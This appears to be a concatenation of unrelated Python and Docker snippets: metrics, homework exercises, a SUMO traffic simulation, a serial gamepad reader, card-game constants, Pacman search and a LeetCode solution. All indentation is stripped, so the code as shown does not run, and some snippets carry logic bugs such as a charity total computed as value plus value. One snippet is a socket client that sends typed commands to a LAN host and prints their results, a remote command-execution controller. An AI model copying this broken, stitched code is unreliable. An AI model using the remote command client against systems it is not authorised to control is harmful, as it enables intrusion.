# We alter the default base class behavior to add all definitions to the existing
# base class instead of inheriting from the base class
m_def = Section(extends_base_section=True)
# We define an additional example quantity. Use the prefix x_<parsername>_ to denote
# non common quantities.
x_example_magic_value = Quantity(type=int, description='The magic value from a magic source.')
m_package.__init_metainfo__()
|
import numpy as np
import pandas as pd
from sklearn.metrics import f1_score
from sklearn.metrics import accuracy_score
from ..preprocessing import data_splitting as ds, labels
def calc_f1_and_acc_for_column(true, predicted):
f1 = f1_score(true, predicted)
acc = accuracy_score(true, predicted)
return f1, acc
def calc_task_wise_f1s(true, predicted, name):
tasks = true.columns
n_tasks = len(tasks)
index = [name + '_f1s']
results = pd.DataFrame(np.zeros([1, n_tasks]), index=index, columns=tasks)
for task in tasks:
results.loc[index[0], task] = f1_score(true.loc[:, task], predicted.loc[:, task])
return results
def calc_task_wise_acc(true, predicted, name):
tasks = true.columns
n_tasks = len(tasks)
index = [name + '_acc']
results = pd.DataFrame(np.zeros([1, n_tasks]), index=index, columns=tasks)
for task in tasks:
results.loc[index[0], task] = accuracy_score(true.loc[:, task], predicted.loc[:, task])
return results
def calc_micro_mean_f1_acc(true, predicted):
n_items, n_tasks = true.shape
y_vector = np.reshape(true.values, [n_items*n_tasks, 1])
p_vector = np.reshape(predicted.values, [n_items*n_tasks, 1])
f1 = f1_score(y_vector, p_vector)
acc = accuracy_score(y_vector, p_vector)
return f1, acc
def calc_macro_mean_f1_pp(true, predicted):
n_items, n_tasks = true.shape
f1s = pd.DataFrame(np.zeros([n_items, 1]), index=true.index)
n_perfect = 0
for index, rid in enumerate(true.index):
f1s.loc[rid] = f1_score(true.loc[rid], predicted.loc[rid])
if np.sum(np.abs(true.loc[rid] - predicted.loc[rid])) == 0:
n_perfect += 1
percent_perfect = n_perfect / float(n_items)
return np.mean(f1s.values), percent_perfect
def get_report_header(dataset, test_fold, dev_subfold):
training_items = ds.get_train_documents(dataset, test_fold, dev_subfold)
dev_items = ds.get_dev_documents(dataset, test_fold, dev_subfold)
multi_y = labels.get_dataset_labels(dataset)
n_items, n_tasks = multi_y.shape
index = ['nTrain', 'nTest']
results = pd.DataFrame(np.zeros([2, n_tasks]), index=index, columns=multi_y.columns)
results.loc['nTrain'] = multi_y.loc[training_items].sum(axis=0)
results.loc['nTest'] = multi_y.loc[dev_items].sum(axis=0)
return results
def get_summary_report_header(datasets, test_fold, dev_subfold):
n_datasets = len(datasets)
index = ['testFold', 'devSubFold', 'nTrain', 'nTest']
header = pd.DataFrame(np.zeros([4, n_datasets]), index=index, columns=datasets)
header.loc['testFold', :] = test_fold
header.loc['devSubFold', :] = dev_subfold
for f in datasets:
training_items = ds.get_train_documents(f, test_fold, dev_subfold)
header.loc['nTrain', f] = len(training_items)
dev_items = ds.get_dev_documents(f, test_fold, dev_subfold)
header.loc['nTest', f] = len(dev_items)
return header
|
with open(r"C:\Users\admin\OneDrive\デスクトップ\python1\07\20k1026-06-dictionary.txt",encoding="utf8") as file:
dict = input("キーを入力してください:") # input
for line in file:
data = line.split(":") # ["input", " " ]
if data[0] == dict:
print(f"{data[1]}")
#
'--------------------------------------------'
|
import socket
client = socket.socket()
ip = '192.168.0.155'
port = 22564
client.connect((ip, port))
while True:
date = input('cmd:').strip()
if not date:
continue
elif date == 'q':
break
else:
client.sendall(date.encode('utf-8'))
output = ''
cmd_ack_result = client.recv(512)
cmd_rev_msg = cmd_ack_result.decode('utf-8').split("|")
client.sendall('OK'.encode('utf-8'))
print(cmd_rev_msg)
if cmd_rev_msg[0] == "CMD_RESULT_SIZE":
cmd_msg_len = int(cmd_rev_msg[1])
if cmd_msg_len == 0:
continue
while True:
response = client.recv(512).decode('utf-8')
msg_len = len(response)
output += response
cmd_msg_len -= msg_len
print(cmd_msg_len)
if cmd_msg_len == 0:
print(output)
print('----------recv_done----------')
break
client.close()
|
# File: hw4_part3.py
# Author: Joel Okpara
# Date: 2/28/2016
# Section: 04
# E-mail: joelo1@umbc.edu
# Description: Figures out how much money user made for charity
# based on the amount of pledges and plunges
def main():
pledges = int(input("How many pledges did you get? "))
value = 0
fkThis = range(1, (pledges + 1))
for n in fkThis:
value = float(input("What was the value of donation "+ str(n)+": "))
totalValue = value + value
plunge = int(input("How many plunges did you do? "))
earned = totalValue * plunge
print("Based on your",plunge,"plunges, you earned:","$"+str(earned),"for charity")
main()
|
"""
You've finished eating at a restaurant, and received this bill:
Cost of meal: $44.50
Restaurant tax: 6.75%
Tip: 15%
"""
meal = 44.50
tax = 0.0675
tip = 0.15
meal = meal + meal * tax
total = meal + meal * tip
print("%.2f" % total)
|
class Add:
requires = ["input"]
provides = ["output"]
def __init__(self, val):
self.val = val
def process(self, data):
data["output"] = data["input"] + self.val
class Mult:
requires = ["input"]
provides = ["output"]
def __init__(self, val):
self.val = val
def process(self, data):
data["output"] = data["input"] * self.val
class Result:
requires = ["output"]
provides = []
def process(self, data):
assert "output" in data
class RequiresNonsense:
requires = ["nonsense"]
provides = ["nothing"]
def process(self, data):
pass
class DummyModule:
requires = ["input"]
provides = []
def process(self, data):
pass
|
#!/usr/bin/env python
"""
@file runner1_try.py
@author yao
SUMO, Simulation of Urban MObility; see http://sumo.dlr.de/
Copyright (C) 2009-2017 DLR/TS, Germany
latest version
"""
from __future__ import absolute_import
from __future__ import print_function
import os
import sys
import optparse
import random
import Globalvar
import tl_c as tlc
# import numpy as np
import generate_routefile as gen_route
# from collections import OrderedDict
try:
sys.path.append(os.path.join(os.path.dirname(
__file__), '..', '..', '..', '..', "tools")) # tutorial in tests
sys.path.append(os.path.join(os.environ.get("SUMO_HOME", os.path.join(
os.path.dirname(__file__), "..", "..", "..")), "tools")) # tutorial in docs
from sumolib import checkBinary # noqa
except ImportError:
sys.exit(
"please declare environment variable 'SUMO_HOME' as the root directory of your sumo installation (it should"
" contain folders 'bin', 'tools' and 'docs')")
# import tl_c as tlc
# we need to import python modules from the $SUMO_HOME/tools directory
import traci
import pdb
import result
# ====================================================================================================
# control main
# ====================================================================================================
def run():
"""execute the TraCI control loop"""
# initialize indices
simstep = 0
# optnr = Globalvar.optnr
# tldcum = OrderedDict() # time point of passing tlc decision point
ldcar = list() # tuple of CAV
av_list = list()
occupancy = 0
# phasetime = 0 # initial phase time
# platoon_size = dict() # dict of: {leader_id: platoon_tailed_id}
# tl_lastswitch = dict()
# we start with phase 2 where EW has green
while traci.simulation.getMinExpectedNumber() > 0:
traci.simulationStep()
if simstep >= 1400: pdb.set_trace()
# create ldcar:list of running auto cars
try:
depart_id = traci.simulation.getDepartedIDList()[0]
except IndexError:
pass
else:
if traci.vehicle.getTypeID(depart_id) == 'auto':
ldcar.extend([depart_id])
av_list.extend([depart_id])
arrived_list = list(traci.simulation.getArrivedIDList())
if arrived_list:
ldcar_set = set(ldcar) - set(arrived_list)
ldcar = list(ldcar_set)
if Globalvar.ramp_metering == 1:
# alinea
tl_id = '2'
tl_control = tlc.TrafficLight(tl_id, simstep)
# pdb.set_trace()
occupancy = tl_control.alinea(occupancy)
simstep += 1
print(simstep)
# print(plplan)
traci.close()
sys.stdout.flush()
# return dist, v, leadingmatrix, ldcar, carcum, testav, merge_cum, split_cum
return av_list, simstep
def get_options():
optParser = optparse.OptionParser()
optParser.add_option("--nogui", action="store_true",
default=False, help="run the commandline version of sumo")
options, args = optParser.parse_args()
return options
def main():
# this is the main entry point of this script
# entry sumo
random.seed(666)
sumoBinary = checkBinary('sumo-gui') # skip the choosing part
# set timestep and random seed
time_step = 0.1
# set global variables and input data
# first, generate the route file for this simulation
gen_route.generate_routefile()
pdb.set_trace()
# vehNr = Globalvar.nrtotal
traci.start([sumoBinary, "-c", "data/cross1.sumocfg", "--step-length", str(time_step),
"--tripinfo-output", "tripinfo.xml", "--time-to-teleport", "1000"])
# main function
av_list, simstep = run()
pdb.set_trace()
rt = result.Result(av_list, int(simstep*time_step))
rt.result_file()
if __name__ == '__main__':
main()
|
FROM continuumio/anaconda3:4.8.3
COPY . /usr/app/
EXPOSE 8501
WORKDIR /usr/app/
RUN pip install -r requirements.txt
CMD streamlit run pratice.py |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import serial
port = serial.Serial("/dev/ttyAMA0", baudrate=57600, timeout=3.0)
def readlineCR(port):
rv = ""
while True:
ch = port.read()
rv += ch
if ch=='\r' or ch=='':
return rv
def keysPS():
salida = {"PS1_CUADRADO":False, "PS1_TRIANGULO":False, "PS1_CIRCULO":False, "PS1_EQUIS":False, "PS1_ARRIBA":False, "PS1_ABAJO":False, "PS1_IZQUIERDA":False, "PS1_DERECHA":False, "PS1_L1":False, "PS1_R1":False, "PS1_L2":False, "PS1_R2":False, "PS1_L3":False, "PS1_R3":False, "PS1_START":False, "PS1_SELECT":False, "PS1_JLARRIBA":False, "PS1_JLABAJO":False, "PS1_JLIZQUIERDA":False, "PS1_JLDERECHA":False, "PS1_JRARRIBA":False, "PS1_JRABAJO":False, "PS1_JRIZQUIERDA":False, "PS1_JRDERECHA":False, "PS2_CUADRADO":False, "PS2_TRIANGULO":False, "PS2_CIRCULO":False, "PS2_EQUIS":False, "PS2_ARRIBA":False, "PS2_ABAJO":False, "PS2_IZQUIERDA":False, "PS2_DERECHA":False, "PS2_L1":False, "PS2_R1":False, "PS2_L2":False, "PS2_R2":False, "PS2_L3":False, "PS2_R3":False, "PS2_START":False, "PS2_SELECT":False, "PS2_JLARRIBA":False, "PS2_JLABAJO":False, "PS2_JLIZQUIERDA":False, "PS2_JLDERECHA":False, "PS2_JRARRIBA":False, "PS2_JRABAJO":False, "PS2_JRIZQUIERDA":False, "PS2_JRDERECHA":False}
while port.inWaiting() > 0:
rcv = readlineCR(port)
if rcv == ";1CU:\r":
salida["PS1_CUADRADO"]=True
elif rcv == ";1TR:\r":
salida["PS1_TRIANGULO"]=True
elif rcv == ";1CI:\r":
salida["PS1_CIRCULO"]=True
elif rcv == ";1EQ:\r":
salida["PS1_EQUIS"]=True
elif rcv == ";1AR:\r":
salida["PS1_ARRIBA"]=True
elif rcv == ";1AB:\r":
salida["PS1_ABAJO"]=True
elif rcv == ";1IZ:\r":
salida["PS1_IZQUIERDA"]=True
elif rcv == ";1DE:\r":
salida["PS1_DERECHA"]=True
elif rcv == ";1L1:\r":
salida["PS1_L1"]=True
elif rcv == ";1R1:\r":
salida["PS1_R1"]=True
elif rcv == ";1L2:\r":
salida["PS1_L2"]=True
elif rcv == ";1R2:\r":
salida["PS1_R2"]=True
elif rcv == ";1L3:\r":
salida["PS1_L3"]=True
elif rcv == ";1R3:\r":
salida["PS1_R3"]=True
elif rcv == ";1ST:\r":
salida["PS1_START"]=True
elif rcv == ";1SE:\r":
salida["PS1_SELECT"]=True
elif rcv == ";1LU:\r":
salida["PS1_JLARRIBA"]=True
elif rcv == ";1LD:\r":
salida["PS1_JLABAJO"]=True
elif rcv == ";1LL:\r":
salida["PS1_JLIZQUIERDA"]=True
elif rcv == ";1LR:\r":
salida["PS1_JLDERECHA"]=True
elif rcv == ";1RU:\r":
salida["PS1_JRARRIBA"]=True
elif rcv == ";1RD:\r":
salida["PS1_JRABAJO"]=True
elif rcv == ";1RL:\r":
salida["PS1_JRIZQUIERDA"]=True
elif rcv == ";1RR:\r":
salida["PS1_JRDERECHA"]=True
elif rcv == ";2CU:\r":
salida["PS2_CUADRADO"]=True
elif rcv == ";2TR:\r":
salida["PS2_TRIANGULO"]=True
elif rcv == ";2CI:\r":
salida["PS2_CIRCULO"]=True
elif rcv == ";2EQ:\r":
salida["PS2_EQUIS"]=True
elif rcv == ";2AR:\r":
salida["PS2_ARRIBA"]=True
elif rcv == ";2AB:\r":
salida["PS2_ABAJO"]=True
elif rcv == ";2IZ:\r":
salida["PS2_IZQUIERDA"]=True
elif rcv == ";2DE:\r":
salida["PS2_DERECHA"]=True
elif rcv == ";2L1:\r":
salida["PS2_L1"]=True
elif rcv == ";2R1:\r":
salida["PS2_R1"]=True
elif rcv == ";2L2:\r":
salida["PS2_L2"]=True
elif rcv == ";2R2:\r":
salida["PS2_R2"]=True
elif rcv == ";2L3:\r":
salida["PS2_L3"]=True
elif rcv == ";2R3:\r":
salida["PS2_R3"]=True
elif rcv == ";2ST:\r":
salida["PS2_START"]=True
elif rcv == ";2SE:\r":
salida["PS2_SELECT"]=True
elif rcv == ";2LU:\r":
salida["PS2_JLARRIBA"]=True
elif rcv == ";2LD:\r":
salida["PS2_JLABAJO"]=True
elif rcv == ";2LL:\r":
salida["PS2_JLIZQUIERDA"]=True
elif rcv == ";2LR:\r":
salida["PS2_JLDERECHA"]=True
elif rcv == ";2RU:\r":
salida["PS2_JRARRIBA"]=True
elif rcv == ";2RD:\r":
salida["PS2_JRABAJO"]=True
elif rcv == ";2RL:\r":
salida["PS2_JRIZQUIERDA"]=True
elif rcv == ";2RR:\r":
salida["PS2_JRDERECHA"]=True
port.write(";1RE:")
port.write(";2RE:")
return salida |
# -*- coding: utf-8 -*-
_ROOM_INIT_DATA={
"hs_hero":[
{
"uid": None, "heroId": 1, "buff":{}, "crystal":1, "name":"PA", "heroClass":"warrior", "element":"air", "atk": 0, "hp": 30, "skillId": 0, "flavorText":"The time is now!"
},
{
"uid": None, "heroId": 2, "buff":{}, "crystal":1, "name":"SK", "heroClass":"warrior", "element":"air", "atk": 0, "hp": 30, "skillId": 0, "flavorText":"The calm, before the storm."
},
]
,
"hs_card": [
{"id": 1, "name":"card1", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "0", "hp": 1, "durability": 0, "skillId": 0, "flavor_text":""},
{"id": 2, "name":"card2", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "1", "hp": 2, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 3, "name":"card3", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "2", "hp": 3, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 4, "name":"card4", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "3", "hp": 4, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 5, "name":"card5", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "4", "hp": 5, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 6, "name":"card6", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "5", "hp": 1, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 7, "name":"card7", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "6", "hp": 2, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 8, "name":"card8", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "7", "hp": 3, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 9, "name":"card9", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "0", "hp": 4, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 10, "name":"card10", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "1", "hp": 5, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 11, "name":"card11", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "2", "hp": 1, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 12, "name":"card12", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "3", "hp": 2, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 13, "name":"card13", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "4", "hp": 3, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 14, "name":"card14", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "5", "hp": 4, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 15, "name":"card15", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "6", "hp": 5, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 16, "name":"card16", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "7", "hp": 1, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 17, "name":"card17", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "0", "hp": 2, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 18, "name":"card18", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "1", "hp": 3, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 19, "name":"card19", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "2", "hp": 4, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 20, "name":"card20", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "3", "hp": 5, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 21, "name":"card21", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "4", "hp": 1, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 22, "name":"card22", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "5", "hp": 2, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 23, "name":"card23", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "6", "hp": 3, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 24, "name":"card24", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "7", "hp": 4, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 25, "name":"card25", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "0", "hp": 5, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 26, "name":"card26", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "1", "hp": 1, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 27, "name":"card27", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "2", "hp": 2, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 28, "name":"card28", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "3", "hp": 3, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 29, "name":"card29", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "4", "hp": 4, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 30, "name":"card30", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "5", "hp": 5, "durability": 0, "skillId": 0, "flavorText":""},
],
}
ROOM_INIT_DATA={
"room_info":{
"roomId":0,
"pos1": None,
"pos2": None,
#首次摸牌者,1 or 2
"first": 0,
#战斗结果
"result": 0,
#回合
"round": 0,
#上一次是谁结束回合,1 or 2
"turn": 0,
#回合是否双方都结束
"turnStatus": 0,
#上一次攻击时间
"actTime1": 0,
"actTime2": 0,
#换首牌时间
"firstChangeCardTime1": 0,
"firstChangeCardTime2": 0,
#摸牌时间
"firstGetCardTime1": 0,
"firstGetCardTime2": 0,
#双方全部完成摸牌时间
"firstGetCardEndTime": 0,
#确认首牌时间
"confirmFirstHCTime1": 0,
"confirmFirstHCTime2": 0,
#当前法力水晶数量
"crystal1":0 ,
"crystal2":0 ,
#牌库没有牌之后进行的回合数
"noCardTurn1":0 ,
"noCardTurn2":0 ,
#当前回合是否使用了英雄技能
"stime1":0 ,
"stime2":0 ,
#当前回合是否装备并使用了武器,装备了武器就可以攻击,但是曾经攻击过就不能攻击
"wtime1":0 ,
"wtime2":0 ,
#首次摸牌 1 or 2
"first": 0,
#双方英雄
"heros": [],
#手牌
"cardHand1": [],
"cardHand2": [],
#原始牌库, dict(10张)
"cardOrigin1": {},
"cardOrigin2": {},
#牌库
"cardAll1": [],
"cardAll2": [],
#桌面上的牌
"cardPlay1": [],
"cardPlay2": [],
#武器 uniqid
"weapon1": {},
#武器 uniqid
"weapon2": {},
#技能/效果堆栈
'effect1':{},
#技能/效果堆栈
'effect2':{},
}
,
}
#status
#默认, 冲锋,嘲讽 ,风怒, 圣盾, 潜行stealth,沉默silence,冰冻frozen,变形transformed, 隐秘secret, stun 眩晕
STATUS_DEFAULT, STATUS_DASH, STATUS_TAUNT, STATUS_WINDFURY, STATUS_SHIELD, STATUS_STEALTH, STATUS_SILENCE, STATUS_FROZEN, \
STATUS_TRANSFORMED, STATUS_SECRET, STATUS_STUN \
= 0, 1, 2, 4, 8 ,16, 32, 64, 128, 256, 512
#卡牌类型
HERO_SKILL, HERO_CREATURE, HERO_EQUIPMENT, HERO_CREATURE_TOKEN, HERO_HEROSKILL, HERO_WEAPON, HERO_HERO= 'skill', \
'creature', 'equipment', 'creatureToken', 'heroSkill', 'weapon', 'hero'
#特效类型
EFFECT_TYPE_CHARGE, EFFECT_TYPE_TAUNT, EFFECT_TYPE_SUMMON, EFFECT_TYPE_DAMAGE, EFFECT_TYPE_HEAL, EFFECT_TYPE_ADDHP, EFFECT_TYPE_ADDMAXHP, EFFECT_TYPE_WINDFURY, \
EFFECT_TYPE_ARMOR, EFFECT_TYPE_STUN, EFFECT_TYPE_ADDATTK, EFFECT_TYPE_ADDCRYSTAL= 'charge', 'taunt', 'summon', 'damage', 'heal', 'addhp', 'addmaxhp', 'windfury', \
'armor', 'stun', 'attack+', 'chakra+'
'''
冰冻,嘲讽,风怒的牌,分数是最多可以持续的回合
once= -1
cardExistence=-2
thisTurnEnd= 1
thisMatchEnd= -3
xTurnsFromNow= x
xTurnsFromNext= x-1
1代表从当前回合开始,持续1回合
2代表从当前回合开始,持续2回合
3代表从当前回合开始,持续3回合
...
每消耗一回合,score-1, score减至0时取消冰冻,嘲讽,风怒等状态, %s为roomId
'''
REDIS_KEY_EFFECT_WINDFURY_TURN= 'hs:effect:windfury:%s'
REDIS_KEY_EFFECT_TAUNT_TURN= 'hs:effect:taunt:%s'
REDIS_KEY_EFFECT_STUN_TURN= 'hs:effect:stun:%s'
REDIS_KEY_EFFECT_ADDATK_TURN= 'hs:effect:addAtk:%s'
V_ATTACK, V_INDEX, V_ARMOR, V_UNIQID, V_HP, V_STATUS, V_TYPE, V_HERO_SKILL_TIME, V_ATTACK_TIME, V_DESKTOP_OPP, V_DESKTOP_SELF, V_CRYSTAL, V_WEAPON= \
'atk', 'i', 'a', 'uqd', 'hp', 's', 't', 'sT', 'aT', 'dOpp', 'dSelf', 'c', 'w'
V_SKILL_CARD_ID= 'sid'
|
from router_solver import *
class Instruction(object):
def __init__(self, character_name, movement, times=None):
self.character_name = character_name
self.movement = movement
if type(times) == int:
self.times = int(times)
# Verifica que dos instructiones sean iguales
def __eq__(self, other):
if type(self) is Instruction and type(other) is Instruction:
self_data = [
self.character_name,
self.movement,
self.times,
]
other_data = [
other.character_name,
other.movement,
other.times,
]
return self_data == other_data
def __hash__(self):
return id(self)
def print_instructions(instructions):
for instruction in instructions:
print("CHARACTER_NAME:", instruction.character_name)
if instruction.movement == "hat":
valid_hats = {1: '"cowboy"', 2: '"cool"', 3: '"shoes"', 4: '"makeup"'}
name = ""
if instruction.times not in valid_hats:
name = "None"
else:
name = valid_hats[instruction.times]
print("ATRIBUTE:", instruction.movement)
print("NAME:", name)
else:
print("MOVEMENT:", instruction.movement)
print("TIMES:", instruction.times)
print()
|
# -*- coding: utf-8 -*-
# search.py
# ---------
# Licensing Information: You are free to use or extend these projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.
#
# Attribution Information: The Pacman AI projects were developed at UC Berkeley
# The core projects and autograders were primarily created by John DeNero
# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).
# Student side autograding was added by Brad Miller, Nick Hay, and
# Pieter Abbeel (pabbeel@cs.berkeley.edu).
"""
In search.py, you will implement generic search algorithms which are called by
Pacman agents (in searchAgents.py).
"""
import util
# import sys
class SearchProblem:
"""This class outlines the structure of a search problem, but doesn't implement
any of the methods (in object-oriented terminology: an abstract class).
You do not need to change anything in this class, ever.
"""
def getStartState(self):
"""
Returns the start state for the search problem.
"""
util.raiseNotDefined()
def isGoalState(self, state):
"""
state: Search state
Returns True if and only if the state is a valid goal state.
"""
util.raiseNotDefined()
def getSuccessors(self, state):
"""
state: Search state
For a given state, this should return a list of triples, (successor,
action, stepCost), where 'successor' is a successor to the current
state, 'action' is the action required to get there, and 'stepCost' is
the incremental cost of expanding to that successor.
"""
util.raiseNotDefined()
def getCostOfActions(self, actions):
"""
actions: A list of actions to take
This method returns the total cost of a particular sequence of actions.
The sequence must be composed of legal moves.
"""
util.raiseNotDefined()
def tinyMazeSearch(problem):
"""
Returns a sequence of moves that solves tinyMaze. For any other maze, the
sequence of moves will be incorrect, so only use this for tinyMaze.
"""
from game import Directions
s = Directions.SOUTH
w = Directions.WEST
return [s, s, w, s, w, w, s, w]
def depthFirstSearch(problem):
"""
Search the deepest nodes in the search tree first.
Your search algorithm needs to return a list of actions that reaches the
goal. Make sure to implement a graph search algorithm.
To get started, you might want to try some of these simple commands to
understand the search problem that is being passed in:
print "Start:", problem.getStartState()
print "Is the start a goal?", problem.isGoalState(problem.getStartState())
print "Start's successors:", problem.getSuccessors(problem.getStartState())
"""
"*** YOUR CODE HERE ***"
print("Start: ", problem.getStartState())
print("Is the start the goal: ",
problem.isGoalState(problem.getStartState()))
print("Start's successors: ",
problem.getSuccessors(problem.getStartState()))
util.raiseNotDefined()
def breadthFirstSearch(problem):
"""Search the shallowest nodes in the search tree first."""
"*** YOUR CODE HERE ***"
util.raiseNotDefined()
def uniformCostSearch(problem):
"""Search the node of least total cost first."""
"*** YOUR CODE HERE ***"
util.raiseNotDefined()
def nullHeuristic(state, problem=None):
"""
A heuristic function estimates the cost from the current state to the
nearest goal in the provided SearchProblem. This heuristic is trivial.
"""
return 0
def testHeuristic(position, problem=None):
xy1 = position
xy2 = problem.goal
return abs(xy1[0] - xy2[0]) + abs(xy1[1] - xy2[1])
def aStarSearch(problem, heuristic=nullHeuristic):
"""Search the node that has the lowest combined cost and heuristic first"""
from util import PriorityQueue
# print("\nStart position: " + str(problem.getStartState()))
# print("\nGoal: " + str(problem.goal))
# print("Heuristic for the start state: " + str(heuristic(problem.getStartState(), problem)))
currentState = problem.getStartState()
nodesToVisit = PriorityQueue()
tree = {}
tree[str(currentState)] = [None, heuristic(currentState, problem), None] # {"node": [parent node, cost to get to the son using this path, action to get from the parent to the son] }
# iter = 1
while(not(problem.isGoalState(currentState))):
# print('\nIteration #' + str(iter))
# print('Current position: ' + str(currentState))
successors = problem.getSuccessors(currentState)
# Visiting the current node
# print('Possible actions for the current node:')
for suc in successors:
cost = heuristic(suc[0], problem) + suc[2]
tracebackState = currentState
while(tracebackState != problem.getStartState()):
cost += 1
tracebackState = tree[str(tracebackState)][0]
# Checking the parenting tree to avoid loops and updating it when needed
# Update is needed if the son does not exist or the cost of the found path is smaller than the one stored in tree
if((str(suc[0]) not in tree.keys()) or (cost < tree[str(suc[0])][1])):
# print('Moving to ' + str(suc[0]) + ' Cost: ' + str(cost))
nodesToVisit.update(suc[0], cost)
tree[str(suc[0])] = [currentState, cost, suc[1]]
# print('Tree updated: ' + '\'' + str(suc[0]) + '\' : ' + str([currentState, cost, suc[1]]))
# else:
# print('Tree did not update: ' + '\'' + str(suc[0]) + '\' : ' + str([currentState, cost, suc[1]]) +
# ' because previous cost was ' + str(tree[str(suc[0])][1]))
# print('Parenting tree: ')
# print(tree)
# Updating to the next node
currentState = nodesToVisit.pop()
# iter += 1
# print('\nFinal tree: ' + str(tree) + '\n')
# Building the path based on the parenting tree
solution = []
while(currentState != problem.getStartState()):
solution.insert(0, tree[str(currentState)][2])
currentState = tree[str(currentState)][0]
# print('Solution: ' + str(solution))
return solution
def aStarSearchTimer(problem, heuristic=nullHeuristic):
from timeit import default_timer
repetitions = 50
start = default_timer()
for i in range(repetitions):
solution = aStarSearch(problem, heuristic)
end = default_timer()
print('Execution time: ' + str((end - start)) + 's')
return solution
# Abbreviations
bfs = breadthFirstSearch
dfs = depthFirstSearch
astar = aStarSearch
ucs = uniformCostSearch
timer = aStarSearchTimer
|
def should_check_command(data):
return data.IsChatMessage() and is_from_streaming_platform(data)
def is_from_streaming_platform(data):
return data.IsFromTwitch() or data.IsFromYoutube()
|
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def isSubPath(self, head, root):
"""
:type head: ListNode
:type root: TreeNode
:rtype: bool
"""
if head is None:
return True
if root is None:
return False
# i wrote them more readable lines but if we dont use return values and
# instead call them directly runs much faster, calling them directly
# runs 112-116ms, and calling with return values runs 228ms
# NOTE: next 4 lines are more readbable version of the return statement
# start_from_root = self.find_path(head, root)
# start_from_left = self.isSubPath(head, root.left)
# start_from_right = self.isSubPath(head, root.right)
# return start_from_root or start_from_left or start_from_right
return self.find_path(head, root) or self.isSubPath(head, root.left) or self.isSubPath(head, root.right)
def find_path(self, head, root):
"""
find a path from given root and head of the linked list
"""
if head is None:
return True
if root is None:
return False
if head.val == root.val:
return self.find_path(head.next, root.left) or self.find_path(head.next, root.right)
|
